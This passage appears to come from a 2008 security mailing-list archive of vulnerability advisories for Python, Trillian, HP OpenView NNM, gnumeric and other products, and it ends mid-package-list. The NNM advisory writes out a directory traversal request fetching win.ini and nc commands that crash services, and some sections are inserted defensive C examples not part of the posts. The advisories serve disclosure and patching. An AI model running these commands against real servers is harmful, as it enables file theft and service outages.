IOActive Security Advisory: Incorrect input validation in PyString_FromStringAndSize() leads to multiple buffer overflows

2008-04-11 Thread Justin Ferguson
Title: Incorrect input validation in PyString_FromStringAndSize() 
   leads to multiple buffer overflows
Date Discovered: ??-April-2008
Date Reported: 08-April-2008
Date Patched: 09-April-2008
Date Disclosed: 11-April-2008
Criticality: High 

Affected Products
-----------------

Python 2.5.2, earlier and unstable versions are likely to be vulnerable

Synopsis
--------

The Python core API provides multiple functions for the allocation
of string objects, specifically providing an API call that allows
for either the allocation or reallocation of a PyStringObject.
This function, PyString_FromStringAndSize(), takes two parameters:
a pointer and a signed integer. If the pointer is non-NULL then
the memory it points to is reallocated to the size specified
by the second parameter. If the pointer is NULL then the number
of bytes specified by the integer are allocated and returned.

During the course of its operations this second parameter is not
validated to contain a positive value. This in turn is summed
with the size of a PyStringObject and passed as a length to an
allocation function, potentially misallocating memory.

The result of this was multiple buffer overflows in various
components such as the previously disclosed zlib bug, the SSL
module, et cetera. Furthermore, a Python developer, Alexander 
Belopolsky noted that the functions PyBytes_FromStringAndSize()
and PyUnicode_FromStringAndSize() contained the same 
characteristics.

Technical Details
-----------------

Python-2.5.2/Objects/stringobject.c:

52  PyObject *
53  PyString_FromStringAndSize(const char *str, Py_ssize_t size)
54  {
55      register PyStringObject *op;
56      assert(size >= 0);
57      if (size == 0 && (op = nullstring) != NULL) {
[...]
63      }
64      if (size == 1 && str != NULL &&
65          (op = characters[*str & UCHAR_MAX]) != NULL)
66      {
[...]
72      }
73
74      /* Inline PyObject_NewVar */
75      op = (PyStringObject *)PyObject_MALLOC(sizeof(PyStringObject) + size);

The type Py_ssize_t is defined to be one of a number of types dependent
on platform; however, regardless of platform, it will be signed. There
is an assert() at line 56 that attempts to verify the sanity of the
second parameter; however, in non-debug builds the assert() is omitted.
Then at line 75 the size parameter and the size of a string object
are summed together and passed as a parameter to PyObject_MALLOC().


Reproduction / Proof-of-Concept
-------------------------------

When the length variable contains a value of -24, the allocator is
told to reserve 0 bytes of memory; however, the allocator modifies
the request and will allocate one byte of memory. For values ranging
between -2 and -23 a small amount of memory will be allocated due
to being summed with the size of a PyStringObject. Because this is
an API call, exploitation beyond that is dependent on the
caller and current environment.

Remediation
-----------

This bug was patched in CVS, patching all three object types. 
Further details can be found at http://bugs.python.org/issue2587
and http://svn.python.org/view?rev=62271&view=rev and 
http://svn.python.org/view?rev=62272&view=rev
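As an added illustration (not the advisory's code and not CPython's), the C below reproduces the arithmetic at line 75 of the listing above with a stand-in structure, beside the sign and overflow check that a release build of PyString_FromStringAndSize() is missing. The stand-in is sized to 24 bytes because the -24 case in the advisory implies that header size; its field layout is an assumption made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for CPython's Py_ssize_t: signed, pointer-sized. */
typedef ptrdiff_t Py_ssize_t;
#define PY_SSIZE_T_MAX PTRDIFF_MAX

/* Stand-in for PyStringObject. Assumption: 24 bytes, the header size the
 * advisory's "-24 yields 0" observation implies; only sizeof matters here. */
struct fake_string_object {
    unsigned char header[23];
    char sval[1];               /* inline character storage */
};

/* What line 75 of the listing computes: header size plus the caller's size,
 * with no sign check. The signed size is converted to size_t for the
 * addition, so a negative value wraps to a huge number and the sum wraps
 * back to a small one (or to 0 for exactly -sizeof(header)). */
size_t naive_alloc_size(Py_ssize_t size)
{
    return sizeof(struct fake_string_object) + (size_t)size;
}

/* Hardened form: reject negative sizes and sizes for which the sum would
 * overflow, before anything reaches the allocator. Returns 0 on success
 * and stores the request size; -1 on rejection. */
int checked_alloc_size(Py_ssize_t size, size_t *out)
{
    if (size < 0)
        return -1;
    if ((size_t)size > (size_t)PY_SSIZE_T_MAX - sizeof(struct fake_string_object))
        return -1;
    *out = sizeof(struct fake_string_object) + (size_t)size;
    return 0;
}

/* Convenience: the byte count the hardened path would request, or 0 when
 * the request is rejected (0 is never a valid answer because the header is
 * always counted). */
size_t hardened_request(Py_ssize_t size)
{
    size_t n;
    return checked_alloc_size(size, &n) == 0 ? n : 0;
}

int main(void)
{
    Py_ssize_t probes[] = { 10, 0, -2, -23, -24, -25 };
    size_t i;
    for (i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("size=%4td  naive=%20zu  hardened=%zu\n",
               probes[i], naive_alloc_size(probes[i]),
               hardened_request(probes[i]));
    return 0;
}
```

The -2 .. -23 range lands in the "small allocation" band the advisory describes, -24 lands on zero, and anything more negative asks for a near-SIZE_MAX allocation that simply fails; the checked version refuses all of them at the API boundary instead of leaving it to each caller.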







Trillian 3.1.9.0 DTD File Buffer Overflow

2008-04-11 Thread david130490
Name:

Trillian 3.1.9.0 DTD File Buffer Overflow



Software:

Trillian 3.1.9.0



Vendor:

Cerulean Studios



Description:

Trillian 3.1.9.0 Basic (and maybe other versions, such as Pro) is
vulnerable in its XML parser when handling the .dtd file type. Exploitation
requires that the user download a malformed file and install it in the stixe
directory (or others). The bug is in a function that parses .dtd files with
SYSTEM and file identifiers.



Web:

http://www.ceruleanstudios.com/



Download a poc file:

http://www.p1mp4m.es/index.php?act=attach&type=post&id=18


Directory traversal and multiple Denials of Service in HP OpenView NNM 7.53

2008-04-11 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  HP OpenView Network Node Manager
              http://www.openview.hp.com/products/nnm/
Versions:     <= 7.53
Platforms:    Windows (tested), Solaris, Linux, HP-UX
Bugs:         A] CGIs directory traversal
              B] Denial of Service in ovalarmsrv
              C] NULL pointer in ovalarmsrv
              D] process termination in ovtopmd
Exploitation: remote
Date:         11 Apr 2008
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


From vendor's website:
OpenView NNM "automates the process of developing a hyper-accurate
topology of your physical network, virtual network services and the
complex relationships between them. It then uses that topology as the
basis for intelligent root cause analysis to enhance network
availability and performance."


###

===
2) Bugs
===

---
A] CGIs directory traversal
---

The CGIs available in NNM use some instructions which filter malicious
chars in the parameters passed by the clients, for example to avoid
directory traversal attacks, XSS and so on.

The path delimiter filtered by these CGIs is the backslash char, so
using the slash will allow an attacker to download the files from the
disk on which is installed NNM.


--
B] Denial of Service in ovalarmsrv
--

The ovalarmsrv service listening on port 2954 can be easily frozen
with CPU at 100% and without the possibility of handling further
requests on both its ports 2953 and 2954 simply by sending an incomplete
multi-line request.
In short, the last numeric parameter of requests 25, 45, 46, 47 and
81 is used to specify how many sub-arguments (one per line) will be
sent.
So ovalarmsrv starts a loop which terminates when all the sub-arguments
are received; closing the connection or not sending all or part of
these arguments will freeze the entire service.
The following are all the supported requests and their "sscanf" format:

  REQUEST_CONTRIB_EVENTS  (22): "%d %d %s"
  REQUEST_PRINT           (25): "%d %d %d %d %s"
  REQUEST_DETAILS         (33): "%d %d %s"
  REQUEST_EVENT_DELETE    (35): "%d %d %s"
  REQUEST_EVENT_ACK       (36): "%d %d %s"
  REQUEST_RUN_ACTION      (37): "%d %d %s %s"
  REQUEST_SPECDATA        (41):
  REQUEST_EVENT_UNACK     (44): "%d %d %s"
  REQUEST_SAVE            (45): "%d %d %d %d %s"
  REQUEST_CAT_CHANGE      (46): "%d %d %d %[^\n]"
  REQUEST_SEV_CHANGE      (47): "%d %d %d %[^\n]"
  REQUEST_CONF_ACTIONS    (48): "%d %d\n"
  REQUEST_RESTORE_STATE   (62): "%d %[^\n]"
  REQUEST_SAVE_DIR        (63):
  REQUEST_LOCALE          (66): "%d"
  REQUEST_FORMAT_PRINT    (81): "%d %d %d %d %s"
  REQUEST_CONF_RUN_ACTION (??): "%d %d %d %[^\n]"


-
C] NULL pointer in ovalarmsrv
-

The parameter which specifies the amount of sub-arguments described
above is used to allocate a certain amount of initial dynamic memory
(value * 2) for storing all the sub-arguments, which is then
reallocated when needed.

Specifying an amount of sub-arguments too big to be allocated results in a
NULL pointer which will crash the service.


-
D] process termination in ovtopmd
-

The ovtopmd service listening on port 2532 uses a special type of
packet (0x36) for forcing the termination of the process ("Exiting due
to request of ovtopmd -k."), so an attacker can use this packet for
causing a Denial of Service.


###

===
3) The Code
===


A]
http://SERVER/OvCgi/OpenView5.exe?Target=Main&Action=../../../../../../windows/win.ini

B,C,D]
http://aluigi.org/poc/closedviewx.zip

  nc SERVER 2954 -v -v -w 2 < closedviewx1.txt
  nc SERVER 2954 -v -v  < closedviewx2.txt
  nc SERVER 2532 -v -v  < closedviewx3.txt


###

==
4) Fix
==


HP has been alerted and is working on a fix


###


--- 
Luigi Auriemma
http://aluigi.org
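Not part of Luigi's advisory: the C below contrasts a filter that rejects only the backslash, as the NNM CGIs are described as doing, with a check that treats both separators as equivalent and refuses any ".." component. The document root in resolve_action() is an assumed placeholder, and the filter assumes the CGI has already URL-decoded the parameter.

```c
#include <stdio.h>
#include <string.h>

/* Weak filter, modelled on the behaviour the advisory describes: only the
 * backslash counts as a path delimiter, so it is the only thing rejected.
 * Returns 1 if the parameter is accepted. */
int weak_filter(const char *param)
{
    return strchr(param, '\\') == NULL;
}

/* Hardened filter: both '/' and '\\' are separators (the Windows CRT
 * accepts either), absolute paths and drive letters are refused, and no
 * component may be "..". Assumes an already URL-decoded, NUL-terminated
 * string. Returns 1 if accepted. */
int strict_filter(const char *param)
{
    size_t n = strlen(param);
    const char *p = param;

    if (n == 0 || n >= 256)
        return 0;
    if (param[0] == '/' || param[0] == '\\')
        return 0;                              /* absolute path */
    if (n >= 2 && param[1] == ':')
        return 0;                              /* drive letter, e.g. C: */

    while (*p) {
        const char *end = p;
        while (*end && *end != '/' && *end != '\\')
            end++;
        if (end == p)
            return 0;                          /* empty component ("//") */
        if (end - p == 2 && p[0] == '.' && p[1] == '.')
            return 0;                          /* parent-directory step */
        p = *end ? end + 1 : end;
    }
    return 1;
}

/* Joins an accepted parameter onto the document root. Returns 0 and fills
 * `out` on success, -1 when the parameter is rejected or does not fit.
 * The root below is an assumed placeholder, not NNM's real layout. */
int resolve_action(const char *param, char *out, size_t outlen)
{
    static const char root[] = "/opt/OV/www/htdocs";
    int len;

    if (!strict_filter(param))
        return -1;
    len = snprintf(out, outlen, "%s/%s", root, param);
    if (len < 0 || (size_t)len >= outlen)
        return -1;
    return 0;
}

int main(void)
{
    const char *probes[] = {
        "Main",
        "../../../../../../windows/win.ini",    /* the advisory's request */
        "..\\..\\..\\windows\\win.ini",
        "reports/..\\..\\windows\\win.ini",     /* mixed separators */
    };
    char path[512];
    size_t i;
    for (i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-36s weak=%d strict=%d %s\n", probes[i],
               weak_filter(probes[i]), strict_filter(probes[i]),
               resolve_action(probes[i], path, sizeof path) == 0
                   ? path : "(rejected)");
    return 0;
}
```

The advisory's request passes weak_filter() untouched, which is the whole bug; strict_filter() rejects it on the first ".." component regardless of which separator follows it, and still accepts names that merely start with two dots.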


[ GLSA 200804-11 ] policyd-weight: Insecure temporary file creation

2008-04-11 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: policyd-weight: Insecure temporary file creation
  Date: April 11, 2008
  Bugs: #214403
ID: 200804-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

policyd-weight uses temporary files in an insecure manner, allowing for
a symlink attack.

Background
==

policyd-weight is a Perl policy daemon for the Postfix MTA intended to
eliminate forged envelope senders and HELOs.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  mail-filter/policyd-weight  < 0.1.14.17  >= 0.1.14.17

Description
===

Chris Howells reported that policyd-weight creates and uses the
"/tmp/.policyd-weight/" directory in an insecure manner.

Impact
==

A local attacker could exploit this vulnerability to delete arbitrary
files or change the ownership to the "polw" user via symlink attacks.

Workaround
==

Set "$LOCKPATH = '/var/run/policyd-weight/'" manually in
"/etc/policyd-weight.conf".

Resolution
==

All policyd-weight users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot -v ">=mail-filter/policyd-weight-0.1.14.17"

This version changes the default path for sockets to
"/var/run/policyd-weight", which is only writable by a privileged user.
Users need to restart policyd-weight immediately after the upgrade due
to this change.

References
==

  [ 1 ] CVE-2008-1569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1569

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-11.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


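The workaround and the fix both move policyd-weight's directory out of /tmp. When a daemon must create its own directory in a shared, world-writable location, the pattern below is what resists the symlink attack the advisory describes. This is an added example, not policyd-weight's code (which is Perl); the names it creates under /tmp are constructed for the demonstration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>

/* Creates `path` as a 0700 directory if it does not exist, then opens it
 * without following symlinks and verifies what was actually opened: a
 * directory, owned by the effective user, not group/world writable.
 * Returns a directory fd (for use with openat) or -1 with errno set. Later
 * file operations use the fd, not the path, so swapping the name after
 * the check cannot redirect them. */
int open_private_dir(const char *path)
{
    struct stat st;
    int fd;

    if (mkdir(path, 0700) != 0 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW refuses a symlink in the final component; O_DIRECTORY
     * refuses a regular file planted under the same name. */
    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0) {
        close(fd);
        return -1;
    }
    if (st.st_uid != geteuid() || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EPERM;           /* someone else's, or writable by others */
        return -1;
    }
    return fd;
}

/* Creates a lock/socket placeholder relative to the verified directory fd.
 * O_EXCL fails rather than following or reusing anything already there. */
int create_lock(int dirfd, const char *name)
{
    return openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_CLOEXEC, 0600);
}

/* Self-check used by main() and the test: a fresh directory is accepted
 * and a second O_EXCL create fails; a symlink planted under the expected
 * name is refused. Names are constructed under /tmp. Returns 1 on success. */
int demo_self_check(void)
{
    char dir[64], lnk[64];
    int dfd, lfd, ok = 0;

    snprintf(dir, sizeof dir, "/tmp/polw-example-%ld", (long)getpid());
    snprintf(lnk, sizeof lnk, "/tmp/polw-example-link-%ld", (long)getpid());

    dfd = open_private_dir(dir);
    if (dfd >= 0) {
        lfd = create_lock(dfd, "lock");
        if (lfd >= 0) {
            close(lfd);
            if (create_lock(dfd, "lock") < 0 && errno == EEXIST)
                ok = 1;
            unlinkat(dfd, "lock", 0);
        }
        close(dfd);
        rmdir(dir);
    }
    /* attacker's move: the expected name already exists as a symlink */
    if (ok && symlink("/tmp", lnk) == 0) {
        ok = open_private_dir(lnk) < 0;
        unlink(lnk);
    } else {
        ok = 0;
    }
    return ok;
}

int main(void)
{
    printf("self-check: %s\n", demo_self_check() ? "ok" : "FAILED");
    return 0;
}
```

A directory under /var/run that only root can write, as the fixed package uses, removes the attacker's ability to pre-create the name at all; the fd-based check above is the fallback for code that cannot rely on that.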


[ GLSA 200804-12 ] gnome-screensaver: Privilege escalation

2008-04-11 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: gnome-screensaver: Privilege escalation
  Date: April 11, 2008
  Bugs: #213940
ID: 200804-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

gnome-screensaver allows local users to bypass authentication under
certain configurations.

Background
==

gnome-screensaver is a screensaver, designed to integrate with the
Gnome desktop, that can replace xscreensaver.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  gnome-extra/gnome-screensaver  < 2.20.0-r3   >= 2.20.0-r3

Description
===

gnome-screensaver incorrectly handles the results of the getpwuid()
function in the file src/setuid.c when using directory servers (like
NIS) during a network outage, a similar issue to GLSA 200705-14.

Impact
==

A local user can crash gnome-screensaver by preventing network
connectivity if the system uses a remote directory service for
credentials such as NIS or LDAP, which will unlock the screen.

Workaround
==

There is no known workaround at this time.

Resolution
==

All gnome-screensaver users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=gnome-extra/gnome-screensaver-2.20.0-r3"

References
==

  [ 1 ] CVE-2008-0887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0887
  [ 2 ] GLSA 200705-14
http://www.gentoo.org/security/en/glsa/glsa-200705-14.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities

2008-04-11 Thread ascii

WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities

 Name              Multiple Vulnerabilities in wClient-PHP
 Systems Affected  wClient-PHP 3.0-2 and earlier versions
 Severity          Medium
 Impact (CVSSv2)   Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N)
 Vendor            http://www.wikidsystems.com/
 Advisory          http://www.ush.it/team/ush/hack-wclient/wikid.txt
 Author            Francesco "ascii" Ongaro (ascii AT ush DOT it)
                   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date              20080411

I. BACKGROUND

From the WiKID website: "The WiKID Strong Authentication System is a
dual-source, software-based two-factor authentication system designed
to be less expensive and more extensible than hardware tokens."

II. DESCRIPTION

In the wClient-PHP package PHP_SELF is echoed back to the client
without proper sanitization leading to XSS issues.

WiKID maintainers have released a new version of the software (3.0-3)
that fixes the exposed vulnerabilities and can be downloaded from the URL:

http://www.wikidsystems.com/downloads/network-clients

Users that based their implementations on the code contained in
sample.php are advised to upgrade.

III. ANALYSIS

During a review of the wClient-PHP-3.0-1.tar.gz package (an additional
component of WiKID with network client functions) the following
vulnerabilities were identified in the sample code:

file sample.php, line 251: PHP_SELF insecure usage leads to XSS



file sample.php, line 269: PHP_SELF insecure usage leads to XSS



file sample.php, line 279: PHP_SELF insecure usage leads to XSS



file sample.php, line 292: possible PHP_SELF insecure usage leads to XSS



This one was not verified since it's not enabled in the version I have
downloaded but probably it's exploitable in the exact same way as
the other ones.

file sample.php, line 306: PHP_SELF insecure usage leads to XSS



$PHP_SELF can be exploited by requesting a URL like file.php/.

Note: On recent PHP versions $PHP_SELF should be $_SERVER['PHP_SELF'].

In case of register_globals=On on recent versions where the variable
is undefined it's possible to override it by issuing PHP_SELF with
the wished value in GPC (GET, POST, COOKIE).

On old version of PHP it's possible to drive the value of PHP_SELF by
GLOBALS poisoning [1].

Version 3.0-2 fixes $PHP_SELF instances to $_SERVER['PHP_SELF']; users
are strongly advised not to use this version as it doesn't correctly
fix the presented vulnerabilities and is more exploitable than 3.0-1.

An attacker can steal UserID, Passcode, Domain code and Registration
code before they are sent back to the server itself and potentially
poison the navigation of the user and steal other sensitive information
via social engineering (injecting additional fields in the form or
showing "additional functions" to the user), abusing the user's trust.

Remediation consists of properly escaping the user-controlled inputs.

[1] http://www.ush.it/2006/01/25/php5-globals-vulnerability/

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20080320 Bug discovered
20080320 Vendor contacted
20080411 Advisory released

IX. CREDIT

Francesco "ascii" Ongaro and Antonio "s4tan" Parata are credited with
the discovery of this vulnerability.

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

Antonio "s4tan" Parata
web site: http://www.ictsc.it/
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it

X. LEGAL NOTICES

Copyright (c) 2008 Francesco "ascii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 04.09.08: EMC DiskXtender Authentication Bypass Vulnerability

2008-04-11 Thread iDefense Labs

iDefense Security Advisory 04.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 09, 2008

I. BACKGROUND

EMC DiskXtender is a data backup and migration suite. It consists of
several applications that are used to manage storing large quantities
of files across multiple storage devices. The main components of the
product suite are the File System Manager, the MediaStor and the
License Server. These components all create RPC endpoints that can be
accessed remotely. For more information see the vendor's website at the
following URL.

http://software.emc.com/products/product_family/diskxtender_family.htm

II. DESCRIPTION

Remote exploitation of an authentication bypass vulnerability in EMC
Corp.'s DiskXtender could allow an attacker to execute arbitrary code.

Each of the main components of the DiskXtender suite is vulnerable to an
authentication bypass vulnerability. Specifically, the authentication
code contains a hard-coded login and password. By connecting to the RPC
interface, and logging on with these credentials, it is possible to
bypass the normal authentication process.

III. ANALYSIS

Exploitation of this vulnerability results in an unauthenticated
attacker gaining administrative access to the DiskXtender server. This
allows an attacker to create and delete files on the backup server, and
run other DiskXtender commands. This could potentially lead to the
execution of arbitrary code with SYSTEM privileges.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in DiskXtender
version 6.20.060 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

"EMC has issued updates to correct this issue. More details can be found
in knowledgebase article emc184091 available from powerlink.emc.com. EMC
customers can further contact EMC Software Technical Support at
1-877-534-2867."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0961 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/21/2008  Initial vendor notification
02/22/2008  Initial vendor response
04/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



iDefense Security Advisory 04.09.08: EMC DiskXtender MediaStor Format String Vulnerability

2008-04-11 Thread iDefense Labs

iDefense Security Advisory 04.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 09, 2008

I. BACKGROUND

EMC DiskXtender is a data backup and migration suite. It consists of
several applications that are used to manage storing large quantities
of files across multiple storage devices. One of the components of
DiskXtender is the MediaStor, which is used to provide support for a
variety of media and device types. For more information see the
vendor's website at the following URL.

http://software.emc.com/products/product_family/diskxtender_family.htm

II. DESCRIPTION

Remote exploitation of a format string vulnerability in EMC Corp.'s
DiskXtender could allow an attacker to execute arbitrary code with the
privileges of the affected service.

When handling requests on the RPC interface with UUID
b157b800-aef5-11d3-ae49-00600834c15f, the service does not properly
validate the content of a string in requests. Since this string is
passed directly to a formatting function, a format string vulnerability
occurs.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service, usually SYSTEM. In
order to exploit this vulnerability, authentication is required.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in DiskXtender
version 6.20.060 for Windows. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

"EMC has issued updates to correct this issue. More details can be found
in knowledgebase article emc184091 available from powerlink.emc.com. EMC
customers can further contact EMC Software Technical Support at
1-877-534-2867."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0963 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/21/2008  Initial vendor notification
02/22/2008  Initial vendor response
04/09/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



[SECURITY] [DSA 1546-1] New gnumeric packages fix arbitrary code execution

2008-04-11 Thread Devin Carraway

------------------------------------------------------------------------
Debian Security Advisory DSA-1546-1                  [EMAIL PROTECTED]
http://www.debian.org/security/                        Devin Carraway
April 10, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: gnumeric
Vulnerability  : integer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-0668

Thilo Pfennig and Morten Welinder discovered several integer overflow
weaknesses in Gnumeric, a GNOME spreadsheet application.  These
vulnerabilities could result in the execution of arbitrary code
through the opening of a maliciously crafted Excel spreadsheet.

For the stable distribution (etch), these problems have been fixed in
version 1.6.3-5+etch1.

For the unstable (sid) distribution, these problems were fixed in
version 1.8.1-1.

We recommend that you upgrade your gnumeric packages.

Upgrade instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
-------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1.dsc
    Size/MD5 checksum:     1332 bf302ccff8f47985439966110044db14
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3.orig.tar.gz
    Size/MD5 checksum: 16479052 da792f23bf26a69788736088e69fc7c0
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1.diff.gz
    Size/MD5 checksum:   358014 8daad80708cbf16cf362475437304e96

Architecture independent packages:

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-common_1.6.3-5.1+etch1_all.deb
    Size/MD5 checksum:  5272974 82f8f43a0c2a8a6d9803e7cdfa0326dd
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-doc_1.6.3-5.1+etch1_all.deb
    Size/MD5 checksum:  4171320 f42bd6770c540f759763a849d7dea505

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_alpha.deb
    Size/MD5 checksum:   158390 458b52bbf3d015c432da2b889d7c3eca
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_alpha.deb
    Size/MD5 checksum:  2351352 7b078d3fcf9a27b75012bec809759981

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_amd64.deb
    Size/MD5 checksum:   156908 8860c1fd0ff35c0a1eda83758fa69457
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_amd64.deb
    Size/MD5 checksum:  2202134 1d74f4a0c7ede26d7911743793f1c548

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_arm.deb
    Size/MD5 checksum:   151102 41063103b8246a7bcc39db1b54a6b065
  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric_1.6.3-5.1+etch1_arm.deb
    Size/MD5 checksum:  2018806 a486eca4fd7b88eb39829eed0743c22d

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/g/gnumeric/gnumeric-plugins-extra_1.6.3-5.1+etch1_hppa.deb
